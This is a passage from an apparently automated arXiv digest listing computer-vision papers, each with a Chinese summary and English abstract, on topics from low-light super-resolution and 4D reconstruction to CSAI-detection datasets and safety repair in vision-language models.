Abstract:We present MeshTailor, the first mesh-native generative framework for synthesizing edge-aligned seams on 3D surfaces. Unlike prior optimization-based or extrinsic learning-based methods, MeshTailor operates directly on the mesh graph, eliminating projection artifacts and fragile snapping heuristics. We introduce ChainingSeams, a hierarchical serialization of the seam graph that prioritizes global structural cuts before local details in a coarse-to-fine manner, and a dual-stream encoder that fuses topological and geometric context. Leveraging this hierarchical representation and enriched vertex embeddings, our MeshTailor Transformer utilizes an autoregressive pointer layer to trace seams vertex-by-vertex within local neighborhoods, ensuring projection-free, edge-aligned seams. Extensive evaluations show that MeshTailor produces more coherent, professional-quality seam layouts compared to recent optimization-based and learning-based baselines.
[CV-188] Dual-Path Learning based on Frequency Structural Decoupling and Regional-Aware Fusion for Low-Light Image Super-Resolution
[Quick Read]: This paper addresses artifact amplification, texture suppression, and structural degradation in low-light image super-resolution (LLISR) caused by processing luminance and texture serially; existing methods perform well on a single task but lack joint modeling of multi-frequency features. The key to the solution is the frequency-aware "Decoupling then Perceive" (DTP) framework with three core modules: 1) a Frequency-aware Structural Decoupling (FSD) mechanism that adaptively separates the input into low-frequency luminance and high-frequency texture subspaces; 2) a Semantics-specific Dual-path Representation (SDR) learning strategy that performs targeted enhancement and reconstruction per frequency band; and 3) a Cross-frequency Semantic Recomposition (CSR) module that ensures structural consistency and perceptual quality in the reconstructed output. The framework models luminance and texture as semantically independent components yet reconstructs them coherently, markedly improving LLISR performance metrics.
Link: https://arxiv.org/abs/2603.27301
Authors: Ji-Xuan He, Jia-Cheng Zhao, Feng-Qi Cui, Jinyang Huang, Yang Liu, Sirui Zhao, Meng Li, Zhi Liu
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Low-light image super-resolution (LLISR) is essential for restoring fine visual details and perceptual quality under insufficient illumination conditions with ubiquitous low-resolution devices. Although pioneer methods achieve high performance on single tasks, they solve both tasks in a serial manner, which inevitably leads to artifact amplification, texture suppression, and structural degradation. To address this, we propose Decoupling then Perceive (DTP), a novel frequency-aware framework that explicitly separates luminance and texture into semantically independent components, enabling specialized modeling and coherent reconstruction. Specifically, to adaptively separate the input into low-frequency luminance and high-frequency texture subspaces, we propose a Frequency-aware Structural Decoupling (FSD) mechanism, which lays a solid foundation for targeted representation learning and reconstruction. Based on the decoupled representation, a Semantics-specific Dual-path Representation (SDR) learning strategy that performs targeted enhancement and reconstruction for each frequency component is further designed, facilitating robust luminance adjustment and fine-grained texture recovery. To promote structural consistency and perceptual alignment in the reconstructed output, building upon this dual-path modeling, we further introduce a Cross-frequency Semantic Recomposition (CSR) module that selectively integrates the decoupled representations. Extensive experiments on the most widely used LLISR benchmarks demonstrate the superiority of our DTP framework, improving + 1.6% PSNR, + 9.6% SSIM, and - 48% LPIPS compared to the most state-of-the-art (SOTA) algorithm. Codes are released at this https URL.
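The core idea of frequency-aware decoupling, that an input splits into a smooth luminance-like component and a residual texture-like component whose sum exactly reconstructs it, can be sketched in 1-D with a box blur standing in for the learned FSD mechanism (the filter choice is an illustrative assumption):

```python
def box_blur_1d(signal, radius=1):
    """Simple low-pass filter: mean over a sliding window (edges clamped)."""
    n = len(signal)
    out = []
    for i in range(n):
        lo, hi = max(0, i - radius), min(n, i + radius + 1)
        out.append(sum(signal[lo:hi]) / (hi - lo))
    return out

signal = [0.0, 0.0, 1.0, 0.0, 0.0, 4.0, 4.0, 4.0]
low = box_blur_1d(signal)                    # smooth, luminance-like component
high = [s - l for s, l in zip(signal, low)]  # residual, texture-like component
# low + high == signal, so each branch can be enhanced independently and the
# results recombined without losing information.
```

DTP's learned decomposition is far richer, but the invariant is the same: whatever the low-frequency path cannot represent lands in the high-frequency path, so recomposition is lossless by construction.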
[CV-189] Complet4R: Geometric Complete 4D Reconstruction
[Quick Read]: This paper addresses geometrically complete 4D reconstruction of dynamic scenes, i.e., recovering temporally coherent, complete 3D geometry over time, including completion of occluded regions. Traditional methods rely on pairwise reconstruction or local motion estimation and struggle to achieve global consistency and completeness. The key to the solution is Complet4R, which casts geometrically complete 4D reconstruction as a unified end-to-end reconstruction-and-completion problem: a decoder-only Transformer aggregates context globally from sequential video and reconstructs complete geometry for every frame, including regions visible only in other frames, maintaining temporal coherence while improving spatial completeness.
Link: https://arxiv.org/abs/2603.27300
Authors: Weibang Wang, Kenan Li, Zhuoguang Chen, Yijun Yuan, Hang Zhao
Institutions: IIIS, Tsinghua University; Shanghai Artificial Intelligence Laboratory; Shanghai Qi Zhi Institute
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:We introduce Complet4R, a novel end-to-end framework for Geometric Complete 4D Reconstruction, which aims to recover temporally coherent and geometrically complete reconstruction for dynamic scenes. Our method formalizes the task of Geometric Complete 4D Reconstruction as a unified framework of reconstruction and completion, by directly accumulating full contexts onto each frame. Unlike previous approaches that rely on pairwise reconstruction or local motion estimation, Complet4R utilizes a decoder-only transformer to operate all context globally directly from sequential video input, reconstructing a complete geometry for every single timestamp, including occluded regions visible in other frames. Our method demonstrates the state-of-the-art performance on our proposed benchmark for Geometric Complete 4D Reconstruction and the 3D Point Tracking task. Code will be released to support future research.
[CV-190] Class-Distribution Guided Active Learning for 3D Occupancy Prediction in Autonomous Driving
[Quick Read]: This paper addresses the severe class imbalance caused by voxel-level representation in 3D occupancy prediction, along with high annotation cost and the inefficiency of labeling dominant classes. The core solution is a class-distribution guided active learning framework that selects samples to annotate via three complementary criteria: (1) inter-sample diversity, prioritizing samples whose predicted class distributions differ most from the labeled set; (2) intra-set diversity, avoiding redundant sampling within each acquisition cycle; and (3) frequency-weighted uncertainty, which reweights voxel-level entropy by the inverse of per-sample class proportions to emphasize rare classes. With only 42.4% of the labels, the method reaches 26.62 mIoU, comparable to full supervision, and its generality is validated across datasets and architectures.
Link: https://arxiv.org/abs/2603.27294
Authors: Wonjune Kim, In-Jae Lee, Sihwan Hwang, Sanmin Kim, Dongsuk Kum
Institutions: KAIST; Seoul National University; Kookmin University
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: IEEE RA-L 2026
Abstract:3D occupancy prediction provides dense spatial understanding critical for safe autonomous driving. However, this task suffers from a severe class imbalance due to its volumetric representation, where safety-critical objects (bicycles, traffic cones, pedestrians) occupy minimal voxels compared to dominant backgrounds. Additionally, voxel-level annotation is costly, yet dedicating effort to dominant classes is inefficient. To address these challenges, we propose a class-distribution guided active learning framework for selecting training samples to annotate in autonomous driving datasets. Our approach combines three complementary criteria to select the training samples. Inter-sample diversity prioritizes samples whose predicted class distributions differ from those of the labeled set, intra-set diversity prevents redundant sampling within each acquisition cycle, and frequency-weighted uncertainty emphasizes rare classes by reweighting voxel-level entropy with inverse per-sample class proportions. We ensure evaluation validity by using a geographically disjoint train/validation split of Occ3D-nuScenes, which reduces train-validation overlap and mitigates potential map memorization. With only 42.4% labeled data, our framework reaches 26.62 mIoU, comparable to full supervision and outperforming active learning baselines at the same budget. We further validate generality on SemanticKITTI using a different architecture, demonstrating consistent effectiveness across datasets.
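The frequency-weighted uncertainty criterion, reweighting voxel entropy by the inverse per-sample class proportion, can be sketched as follows (class names and probabilities are toy values, not from the paper):

```python
import math
from collections import Counter

def frequency_weighted_uncertainty(voxel_probs, voxel_classes):
    """Score a sample by voxel entropy reweighted with the inverse of the
    per-sample class proportion, so rare classes contribute more."""
    counts = Counter(voxel_classes)
    total = len(voxel_classes)
    score = 0.0
    for probs, cls in zip(voxel_probs, voxel_classes):
        entropy = -sum(p * math.log(p) for p in probs if p > 0)
        weight = total / counts[cls]          # inverse class proportion
        score += weight * entropy
    return score / total

uniform = [0.5, 0.5]   # maximally uncertain binary prediction per voxel
common_heavy = frequency_weighted_uncertainty([uniform] * 4, ["road"] * 4)
rare_heavy = frequency_weighted_uncertainty([uniform] * 4, ["road", "road", "road", "cone"])
```

With identical per-voxel entropy, the sample containing a rare class ("cone") scores strictly higher, which is exactly the bias toward safety-critical rare objects the paper motivates.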
[CV-191] Human-Centric Perception for Child Sexual Abuse Imagery
[Quick Read]: This paper addresses the difficulty of automating Child Sexual Abuse Imagery (CSAI) classification, where prevailing black-box models lack objectivity and explainability, struggle to capture subtle cues of sexuality such as pose and attire, and offer no fine-grained modeling of human body structure. The key to the solution is the new hierarchically labeled Body-Keypoint-Part Dataset (BKPD) together with two methods for joint pose estimation and detection, BKP-Association and YOLO-BKP, which produce a decomposed representation of each individual and their body parts (head, chest, hip, hands). Explicitly modeling body structure improves discrimination of sexually suggestive content and opens a path toward more transparent, explainable CSAI classification systems.
Link: https://arxiv.org/abs/2603.27290
Authors: Camila Laranjeira, João Macedo, Sandra Avila, Fabrício Benevenuto, Jefersson A. dos Santos
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: submitted to IEEE Transactions on Information Forensics and Security (TIFS)
Abstract:Law enforcement agencies and non-governmental organizations handling reports of Child Sexual Abuse Imagery (CSAI) are overwhelmed by large volumes of data, requiring the aid of automation tools. However, defining sexual abuse in images of children is inherently challenging, encompassing sexually explicit activities and hints of sexuality conveyed by the individual’s pose, or their attire. CSAI classification methods often rely on black-box approaches, targeting broad and abstract concepts such as pornography. Thus, our work is an in-depth exploration of tasks from the literature on Human-Centric Perception, across the domains of safe images, adult pornography, and CSAI, focusing on targets that enable more objective and explainable pipelines for CSAI classification in the future. We introduce the Body-Keypoint-Part Dataset (BKPD), gathering images of people from varying age groups and sexual explicitness to approximate the domain of CSAI, along with manually curated hierarchically structured labels for skeletal keypoints and bounding boxes for person and body parts, including head, chest, hip, and hands. We propose two methods, namely BKP-Association and YOLO-BKP, for simultaneous pose estimation and detection, with targets associated per individual for a comprehensive decomposed representation of each person. Our methods are benchmarked on COCO-Keypoints and COCO-HumanParts, as well as our human-centric dataset, achieving competitive results with models that jointly perform all tasks. Cross-domain ablation studies on BKPD and a case study on RCPD highlight the challenges posed by sexually explicit domains. Our study addresses previously unexplored targets in the CSAI domain, paving the way for novel research opportunities.
[CV-192] Uni-World VLA: Interleaved World Modeling and Planning for Autonomous Driving ECCV2026
[Quick Read]: This paper addresses the open-loop reasoning problem caused by separating world modeling from planning in autonomous driving: predicting future scenes first and planning afterwards lets the imagined rollout drift away from the actual decision process. The key to the solution is Uni-World VLA, a unified Vision-Language-Action (VLA) model that tightly interleaves future-frame prediction and trajectory planning, alternating at each step between generating future frames and ego actions so that planning decisions are continuously conditioned on imagined future observations; this forms a closed loop between world modeling and control, enabling more adaptive decision-making in dynamic traffic. In addition, monocular depth information is incorporated into the frames to provide stronger geometric cues, further improving long-horizon scene prediction.
Link: https://arxiv.org/abs/2603.27287
Authors: Qiqi Liu, Huan Xu, Jingyu Li, Bin Sun, Zhihui Hao, Dangen She, Xiatian Zhu, Li Zhang
Institutions: Unknown
Subjects: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
Comments: 22 pages, 8 figures. Submitted to ECCV 2026. Code will be released
Abstract:Autonomous driving requires reasoning about how the environment evolves and planning actions accordingly. Existing world-model-based approaches typically predict future scenes first and plan afterwards, resulting in open-loop imagination that may drift from the actual decision process. In this paper, we present Uni-World VLA, a unified vision-language-action (VLA) model that tightly interleaves future frame prediction and trajectory planning. Instead of generating a full world rollout before planning, our model alternates between predicting future frames and ego actions step by step, allowing planning decisions to be continuously conditioned on the imagined future observations. This interleaved generation forms a closed-loop interaction between world modeling and control, enabling more adaptive decision-making in dynamic traffic scenarios. In addition, we incorporate monocular depth information into frames to provide stronger geometric cues for world modeling, improving long-horizon scene prediction. Experiments on the NAVSIM benchmark show that our approach achieves competitive closed-loop planning performance while producing high-fidelity future frame predictions. These results demonstrate that tightly coupling world prediction and planning is a promising direction for scalable VLA driving systems.
[CV-193] TrackMAE: Video Representation Learning via Track Mask and Predict CVPR2026
[Quick Read]: This paper addresses the fact that current masked video modeling (MVM) methods encode motion only implicitly during self-supervised pretraining, limiting the representation of temporal dynamics and hurting performance on motion-centric tasks. The key to the solution is TrackMAE, which explicitly uses motion as a reconstruction signal: an off-the-shelf point tracker sparsely extracts motion trajectories from videos, a motion-aware masking strategy improves on random tube masking, and motion targets are introduced as complementary supervision in both pixel and feature semantic reconstruction spaces, strengthening the learned video representations.
Link: https://arxiv.org/abs/2603.27268
Authors: Renaud Vandeghen, Fida Mohammad Thoker, Marc Van Droogenbroeck, Bernard Ghanem
Institutions: University of Liège; KAUST
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: Accepted to CVPR 2026
Abstract:Masked video modeling (MVM) has emerged as a simple and scalable self-supervised pretraining paradigm, but only encodes motion information implicitly, limiting the encoding of temporal dynamics in the learned representations. As a result, such models struggle on motion-centric tasks that require fine-grained motion awareness. To address this, we propose TrackMAE, a simple masked video modeling paradigm that explicitly uses motion information as a reconstruction signal. In TrackMAE, we use an off-the-shelf point tracker to sparsely track points in the input videos, generating motion trajectories. Furthermore, we exploit the extracted trajectories to improve random tube masking with a motion-aware masking strategy. We enhance video representations learned in both pixel and feature semantic reconstruction spaces by providing a complementary supervision signal in the form of motion targets. We evaluate on six datasets across diverse downstream settings and find that TrackMAE consistently outperforms state-of-the-art video self-supervised learning baselines, learning more discriminative and generalizable representations. Code available at this https URL
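A motion-aware masking strategy of the kind described, biasing masking toward tokens on high-motion trajectories, might be sketched like this (the weighting scheme and bias factor are illustrative assumptions, not TrackMAE's exact rule):

```python
import random

def motion_aware_mask(motion_mags, mask_ratio=0.5, bias=4.0, seed=0):
    """Pick token indices to mask, weighting the draw by each token's track
    motion magnitude so high-motion tubes are masked more often."""
    rng = random.Random(seed)
    weights = [1.0 + bias * m for m in motion_mags]  # static tokens keep weight 1
    k = int(len(motion_mags) * mask_ratio)
    indices = list(range(len(motion_mags)))
    masked = set()
    while len(masked) < k:                           # sample without replacement
        (pick,) = rng.choices(indices, weights=weights, k=1)
        masked.add(pick)
    return masked

# 8 static tokens (motion 0) followed by 8 moving tokens (motion 1).
mags = [0.0] * 8 + [1.0] * 8
masked = motion_aware_mask(mags)
```

Averaged over seeds, moving tokens are masked far more often than static ones, forcing the model to reconstruct precisely the regions whose temporal dynamics it would otherwise ignore.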
[CV-194] TrendGen: An Outfit Recommendation and Display System
[Quick Read]: This paper addresses how inconsistent lighting, non-ideal garment angles, complex backgrounds, and occlusions in raw fashion e-commerce images limit the performance of generative AI for garment understanding and recommendation. The key to the solution is the TrendGen system, which fuses garment images with product attributes and uses generative AI to convert low-quality raw images into high-quality lay-down views, improving the accuracy and consistency of intelligent outfit recommendation for online shopping and delivering trend-aligned, clearly structured garment presentation.
Link: https://arxiv.org/abs/2603.27264
Authors: Theodoros Koukopoulos, Dimos Klimenof, Ioannis Xarchakos
Institutions: SabinoDB; University of Toronto
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Recent advances in Computer Vision have significantly improved image understanding and generation, revolutionizing the fashion industry. However, challenges such as inconsistent lighting, non-ideal garment angles, complex backgrounds, and occlusions in raw images hinder their full potential. Overcoming these obstacles is crucial for developing robust fashion AI systems capable of real-world applications. In this paper, we introduce TrendGen, a Fashion AI system designed to enhance online shopping with intelligent outfit recommendations. Deployed on a major e-commerce platform, TrendGen leverages cloth images and product attributes to generate trend-aligned, cohesive outfit suggestions. Additionally, it employs Generative AI to transform raw images into high-quality lay-down views, offering a clear and structured presentation of garments. Our evaluation on production data demonstrates TrendGen’s consistent high-quality outfits and lay-down images, marking a significant advancement in AI-driven solutions for fashion retail.
[CV-195] MD-RWKV-UNet: Scale-Aware Anatomical Encoding with Cross-Stage Fusion for Multi-Organ Segmentation
[Quick Read]: This paper addresses the challenges of multi-organ segmentation posed by large anatomical variability, complex inter-organ dependencies, and diverse organ scales and shapes, where conventional encoder-decoder architectures struggle to capture fine-grained local detail and long-range context simultaneously. The key to the solution is MD-RWKV-UNet, whose core MD-RWKV block is a dual-path structure combining deformable spatial shifts with the Receptance Weighted Key Value (RWKV) mechanism, letting the receptive field adapt dynamically to local structural cues; Selective Kernel Attention adaptively selects convolutional kernels with different receptive fields, strengthening multi-scale interaction and robustness to variation in organ size and shape; and a cross-stage dual-attention fusion strategy aggregates multi-level encoder features, preserving low-level structure while enhancing semantic consistency, yielding a lightweight yet expressive approach to dynamic organ modeling.
Link: https://arxiv.org/abs/2603.27261
Authors: Zhuoyi Fang
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Image and Video Processing (eess.IV)
Comments:
Abstract:Multi-organ segmentation in medical imaging remains challenging due to large anatomical variability, complex inter-organ dependencies, and diverse organ scales and shapes. Conventional encoder-decoder architectures often struggle to capture both fine-grained local details and long-range context, which are crucial for accurate delineation - especially for small or deformable organs. To address these limitations, we propose MD-RWKV-UNet, a dynamic encoder network that enables scale-aware representation and spatially adaptive context modeling. At its core is the MD-RWKV block, a dual-path module that integrates deformable spatial shifts with the Receptance Weighted Key Value mechanism, allowing the receptive field to adapt dynamically to local structural cues. We further incorporate Selective Kernel Attention to enable adaptive selection of convolutional kernels with varying receptive fields, enhancing multi-scale interaction and improving robustness to organ size and shape variation. In parallel, a cross-stage dual-attention fusion strategy aggregates multi-level features across the encoder, preserving low-level structure while enhancing semantic consistency. Unlike methods that stack static convolutions or rely heavily on global attention, our approach provides a lightweight yet expressive solution for dynamic organ modeling. Experiments on Synapse and ACDC demonstrate state-of-the-art performance, particularly in boundary precision and small-organ segmentation.
[CV-196] Seeing the Scene Matters: Revealing Forgetting in Video Understanding Models with a Scene-Aware Long-Video Benchmark
[Quick Read]: This paper addresses the weak scene-level temporal context modeling of current vision-language models (VLMs) in long video understanding (LVU), i.e., pronounced forgetting over long-range, cross-scene dependencies. The key to the solution is SceneBench, a new benchmark for systematically evaluating VLM reasoning under scene-level semantic consistency, together with Scene Retrieval-Augmented Generation (Scene-RAG), which builds a dynamic scene memory to retrieve and integrate relevant cross-scene context, improving retention and use of long-range temporal information; experiments show a +2.50% performance gain from this approach.
Link: https://arxiv.org/abs/2603.27259
Authors: Seng Nam Chen, Hao Chen, Chenglam Ho, Xinyu Mao, Jinping Wang, Yu Zhang, Chao Li
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Long video understanding (LVU) remains a core challenge in multimodal learning. Although recent vision-language models (VLMs) have made notable progress, existing benchmarks mainly focus on either fine-grained perception or coarse summarization, offering limited insight into temporal understanding over long contexts. In this work, we define a scene as a coherent segment of a video in which both visual and semantic contexts remain consistent, aligning with human perception. This leads us to a key question: can current VLMs reason effectively over long, scene-level contexts? To answer this, we introduce a new benchmark, SceneBench, designed to provide scene-level challenges. Our evaluation reveals a sharp drop in accuracy when VLMs attempt to answer scene-level questions, indicating significant forgetting of long-range context. To further validate these findings, we propose Scene Retrieval-Augmented Generation (Scene-RAG), which constructs a dynamic scene memory by retrieving and integrating relevant context across scenes. This Scene-RAG improves VLM performance by +2.50%, confirming that current models still struggle with long-context retention. We hope SceneBench will encourage future research toward VLMs with more robust, human-like video comprehension.
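Scene-RAG's retrieval step, selecting the scenes most relevant to a query from a scene memory, reduces at its core to nearest-neighbor search over scene embeddings; a minimal cosine-similarity sketch (scene ids and embedding vectors are toy values, not the paper's representation):

```python
def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    nu = sum(a * a for a in u) ** 0.5
    nv = sum(b * b for b in v) ** 0.5
    return dot / (nu * nv)

def retrieve_scenes(query, scene_memory, top_k=2):
    """Return ids of the top_k scenes whose embeddings best match the query."""
    ranked = sorted(scene_memory, key=lambda item: cosine(query, item[1]), reverse=True)
    return [scene_id for scene_id, _ in ranked[:top_k]]

# Toy scene memory: (scene id, embedding) pairs accumulated while watching.
scene_memory = [
    ("kitchen", [0.9, 0.1, 0.0]),
    ("garage", [0.0, 1.0, 0.2]),
    ("kitchen_later", [0.8, 0.2, 0.1]),
]
hits = retrieve_scenes([1.0, 0.0, 0.0], scene_memory)
```

The retrieved scene segments (here, the two kitchen scenes) would then be fed back into the VLM's context, which is how Scene-RAG counteracts forgetting over long videos.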
[CV-197] Zero-shot Vision-Language Reranking for Cross-View Geolocalization
【速读】:该论文旨在解决跨视角地理定位(Cross-view Geolocalization, CVGL)系统在高召回率(Recall@k)下难以准确识别最优匹配(Top-1精度低)的问题。其解决方案的关键在于引入零样本视觉语言模型(Vision-Language Models, VLMs)作为重排序器(reranker),并提出一个两阶段框架:首先使用当前最优检索方法获取候选集,再通过VLM对候选进行重排序。研究发现,基于点对点(Pointwise)的绝对相关性评分策略会导致性能严重下降或无改善,而基于成对比较(Pairwise)的相对判断策略则能有效提升Top-1准确率,尤其当采用LLaVA模型时表现显著。核心结论是:VLMs虽不擅长绝对相关性打分,但在细粒度视觉对比判断上具有优势,因此Pairwise重排序是提升CVGL精度的有效路径。
链接: https://arxiv.org/abs/2603.27251
作者: Yunus Talha Erzurumlu,John E. Anderson,William J. Shuart,Charles Toth,Alper Yilmaz
机构: The Ohio State University(俄亥俄州立大学); US Army Corps of Engineers Geospatial Research Lab(美国陆军工程兵团地理空间研究实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 7 pages, 4 figures. Accepted to XXV ISPRS Congress
Abstract:Cross-view geolocalization (CVGL) systems, while effective at retrieving a list of relevant candidates (high Recall@k), often fail to identify the single best match (low Top-1 accuracy). This work investigates the use of zero-shot Vision-Language Models (VLMs) as rerankers to address this gap. We propose a two-stage framework: state-of-the-art (SOTA) retrieval followed by VLM reranking. We systematically compare two strategies: (1) Pointwise (scoring candidates individually) and (2) Pairwise (comparing candidates relatively). Experiments on the VIGOR dataset show a clear divergence: all pointwise methods cause a catastrophic drop in performance or no change at all. In contrast, a pairwise comparison strategy using LLaVA improves Top-1 accuracy over the strong retrieval baseline. Our analysis concludes that, these VLMs are poorly calibrated for absolute relevance scoring but are effective at fine-grained relative visual judgment, making pairwise reranking a promising direction for enhancing CVGL precision.
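论文的关键结论是成对(Pairwise)比较优于逐点(Pointwise)打分。成对重排序可以用如下极简计票草图示意(`prefer(a, b)` 是 VLM 相对判断的占位函数,非论文实现;此处用数值比较模拟):

```python
def pairwise_rerank(candidates, prefer):
    """对候选两两比较并计票,胜场最多者作为 Top-1。
    prefer(a, b) 返回 True 表示 a 优于 b(实际中由 VLM 判定,这里是占位)。"""
    wins = {c: 0 for c in candidates}
    for i, a in enumerate(candidates):
        for b in candidates[i + 1:]:
            if prefer(a, b):
                wins[a] += 1
            else:
                wins[b] += 1
    return max(candidates, key=lambda c: wins[c])

# 玩具示例:用数值大小模拟"相对视觉判断"
best = pairwise_rerank([3, 9, 5], prefer=lambda a, b: a > b)
print(best)  # 9
```

对 k 个候选,这种全配对方案需要 O(k²) 次 VLM 调用,因此通常只对检索阶段返回的少量 top-k 候选做重排。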
[CV-198] IP-SAM: Prompt-Space Conditioning for Prompt-Absent Camouflaged Object Detection
【速读】:该论文旨在解决提示条件下的基础分割模型(prompt-conditioned foundation segmenters)在实际部署中因缺乏显式空间提示(如点、框、掩码)而导致的结构不匹配问题,即模型在推理时无法获取训练阶段依赖的外部提示,从而影响分割性能。其解决方案的关键在于从提示空间(prompt-space)角度重新思考适应机制:提出IP-SAM框架,通过一个自提示生成器(Self-Prompt Generator, SPG)将图像上下文蒸馏为互补的内在提示(intrinsic prompts),作为粗粒度区域锚点,并利用冻结的SAM2提示编码器恢复提示引导的解码过程;同时引入提示空间门控机制(Prompt-Space Gating, PSG),以内在背景提示作为非对称抑制约束,在解码前有效抑制由背景引发的假阳性响应。该策略在无需外部提示的情况下实现了最优性能,并展现出良好的零样本迁移能力。
链接: https://arxiv.org/abs/2603.27250
作者: Huiyao Zhang,Jin Bai,Rui Guo,JianWen Tan,HongFei Wang,Ye Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Prompt-conditioned foundation segmenters have emerged as a dominant paradigm for image segmentation, where explicit spatial prompts (e.g., points, boxes, masks) guide mask decoding. However, many real-world deployments require fully automatic segmentation, creating a structural mismatch: the decoder expects prompts that are unavailable at inference. Existing adaptations typically modify intermediate features, inadvertently bypassing the model’s native prompt interface and weakening prompt-conditioned decoding. We propose IP-SAM, which revisits adaptation from a prompt-space perspective through prompt-space conditioning. Specifically, a Self-Prompt Generator (SPG) distills image context into complementary intrinsic prompts that serve as coarse regional anchors. These cues are projected through SAM2’s frozen prompt encoder, restoring prompt-guided decoding without external intervention. To suppress background-induced false positives, Prompt-Space Gating (PSG) leverages the intrinsic background prompt as an asymmetric suppressive constraint prior to decoding. Under a deterministic no-external-prompt protocol, IP-SAM achieves state-of-the-art performance across four camouflaged object detection benchmarks (e.g., MAE 0.017 on COD10K) with only 21.26M trainable parameters (optimizing SPG, PSG, and a task-specific mask decoder trained from scratch, alongside image-encoder LoRA while keeping the prompt encoder frozen). Furthermore, the proposed conditioning strategy generalizes beyond COD to medical polyp segmentation, where a model trained solely on Kvasir-SEG exhibits strong zero-shot transfer to both CVC-ClinicDB and ETIS.
[CV-199] SaSaSaSa2VA: 2nd Place of the 5th PVUW MeViS-Text Track
【速读】:该论文旨在解决视频目标分割(Video Object Segmentation, VOS)中基于静态文本描述的指代表达(referring expression)任务在处理运动中心表达(motion-centric expressions)时性能不足的问题,尤其是在引入“无目标查询”(no-target queries)场景下的鲁棒性挑战。解决方案的关键在于提出一种简单但有效的目标存在感知验证机制(target existence-aware verification mechanism),通过增强模型对目标是否存在进行判断的能力,在不显著增加复杂度的前提下,显著提升了在MeViS基准上的性能表现,最终在第5届PVUW挑战赛(MeViS-Text Track)中取得89.19的分数并位列第二。
链接: https://arxiv.org/abs/2603.27241
作者: Dengxian Gong,Quanzhu Niu,Shihao Chen,Yuanzheng Wu,Yikang Zhou,Tao Zhang,Haobo Yuan,Lu Qi,Shunping Ji
机构: Wuhan University (武汉大学); University of California, Merced (加州大学默塞德分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Referring video object segmentation (RVOS) commonly grounds targets in videos based on static textual cues. MeViS benchmark extends this by incorporating motion-centric expressions (referring reasoning motion expressions) and introducing no-target queries. Extending SaSaSa2VA, where increased input frames and [SEG] tokens already strengthen the Sa2VA backbone, we adopt a simple yet effective target existence-aware verification mechanism, leading to Still Awesome SaSaSa2VA (SaSaSaSa2VA). Despite its simplicity, the method achieves a final score of 89.19 in the 5th PVUW Challenge (MeViS-Text Track), securing 2nd place. Both quantitative results and ablations suggest that this existence-aware verification strategy is sufficient to unlock strong performance on motion-centric referring tasks.
[CV-200] Diagnosing and Repairing Unsafe Channels in Vision-Language Models via Causal Discovery and Dual-Modal Safety Subspace Projection CVPR2026
【速读】:该论文旨在解决大型视觉语言模型(Large Vision-Language Models, LVLMs)内部安全机制不透明且难以控制的问题,特别是识别并修复导致不安全行为的神经通路。解决方案的关键在于提出一个因果-子空间修复框架(CARE),首先通过因果中介分析(causal mediation analysis)定位对不安全行为具有因果影响的神经元和层;随后设计一种双模态安全子空间投影方法,利用良性与恶意激活之间的广义特征分解学习视觉和文本模态的通用安全子空间,并在推理阶段通过混合融合机制动态地将激活投影至这些子空间,自适应地平衡视觉与文本修正,从而有效抑制不安全特征的同时保持语义保真度。
链接: https://arxiv.org/abs/2603.27240
作者: Jinhu Fu,Yihang Lou,Qingyi Si,Shudong Zhang,Yan Bai,Sen Su
机构: Beijing University of Posts and Telecommunications (北京邮电大学); Huawei Technologies Ltd. (华为技术有限公司); Peking University (北京大学); Chongqing University of Posts and Telecommunications (重庆邮电大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted by CVPR 2026 main conference
Abstract:Large Vision-Language Models (LVLMs) have achieved impressive performance across multimodal understanding and reasoning tasks, yet their internal safety mechanisms remain opaque and poorly controlled. In this work, we present a comprehensive framework for diagnosing and repairing unsafe channels within LVLMs (CARE). We first perform causal mediation analysis to identify neurons and layers that are causally responsible for unsafe behaviors. Based on these findings, we introduce a dual-modal safety subspace projection method that learns generalized safety subspaces for both visual and textual modalities through generalized eigen-decomposition between benign and malicious activations. During inference, activations are dynamically projected toward these safety subspaces via a hybrid fusion mechanism that adaptively balances visual and textual corrections, effectively suppressing unsafe features while preserving semantic fidelity. Extensive experiments on multiple safety benchmarks demonstrate that our causal-subspace repair framework significantly enhances safety robustness without degrading general multimodal capabilities, outperforming prior activation steering and alignment-based baselines. Additionally, our method exhibits good transferability, defending against unseen attacks.
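摘要中提到的"良性与恶意激活之间的广义特征分解"可以用白化实现:对良性协方差做 Cholesky 白化后,再对恶意协方差做普通对称特征分解。下面是一个仅依赖 NumPy 的假设性草图(矩阵规模、投影方式均为示意,非论文实现):

```python
import numpy as np

def safety_directions(benign, malicious, k=1, eps=1e-6):
    """良性/恶意激活的广义特征分解(白化实现),返回前 k 个"不安全方向"。
    benign, malicious: (N, d) 激活矩阵。"""
    d = benign.shape[1]
    Cb = np.cov(benign, rowvar=False) + eps * np.eye(d)
    Cm = np.cov(malicious, rowvar=False) + eps * np.eye(d)
    L = np.linalg.cholesky(Cb)
    Linv = np.linalg.inv(L)
    M = Linv @ Cm @ Linv.T                 # 白化后的对称矩阵
    vals, vecs = np.linalg.eigh(M)         # 特征值升序
    W = Linv.T @ vecs[:, ::-1][:, :k]      # 取广义特征值最大的 k 个方向
    return W / np.linalg.norm(W, axis=0, keepdims=True)

def project_out(x, W):
    """去除激活 x 中落在不安全方向上的分量(k=1 时 W 为单位向量)。"""
    return x - W @ (W.T @ x)

rng = np.random.default_rng(0)
benign = rng.normal(size=(200, 4))
malicious = benign + rng.normal(size=(200, 4)) * np.array([5.0, 0.1, 0.1, 0.1])
W = safety_directions(benign, malicious, k=1)
x_safe = project_out(rng.normal(size=4), W)
print(abs(float(W[:, 0] @ x_safe)) < 1e-8)  # True:不安全分量已被移除
```

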